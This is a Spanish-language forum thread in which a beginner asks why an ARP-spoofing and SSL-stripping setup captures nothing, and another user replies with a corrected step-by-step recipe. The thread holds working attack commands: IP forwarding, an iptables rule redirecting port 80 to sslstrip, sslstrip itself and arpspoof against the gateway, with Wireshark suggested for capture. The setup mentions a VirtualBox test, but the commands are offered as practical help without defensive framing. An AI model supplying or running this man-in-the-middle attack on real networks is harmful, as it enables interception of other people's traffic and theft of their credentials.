Gracias,( ya tengo VBox configurado
)que lio llevo,llevo poco con Linux y en este mundillo... Yo lo que hago es ejecuto 3 terminales en el primero pongo:
echo 1 > /proc/sys/net/ipv4/ip_forward
En los otros 2,en uno pongo sudo arpspoof -i wlan0 -t 192.168.1.1 192.168.1.3
y en la otra consola al contrario:
sudo arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1
En las pantallas se ve que esta haciendo arp,luego en otra consola activo sslstrip y iptables y ya en otra pongo dsniff -i wlan0,y ahora me meto en una pagina https... (desde Vbox claro) o cualquier pagina pero nada,no sale nada,hago algo mal? Gracias
Haber... llevas un pollo mental... lo mejor sería que utilizaras 2 ordenadores, atacante y víctima, pero si solo tienes uno pues nada. No necesitan abrir 3 consolas y mucho menos realizar 2 veces el ataque. Acuérdate además de usar la última versión de SSLstrip, la 0.9:
En la 1ª consola:
sudo echo "1" > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo sslstrip -a -l 10000
En la 2ª consola:
sudo arpspoof -i wlan0 <puertadeenlace>
*wlan0 o la interfaz que tengas.
Dsniff no lo controlo, te recomiendo que captures con Wireshark...
Por cierto, con mi cuenta no podia redireccionar el tráfico del 80 por falta de permisos asi que lo hago desde root, no se si a ti te dejara... Un saludo.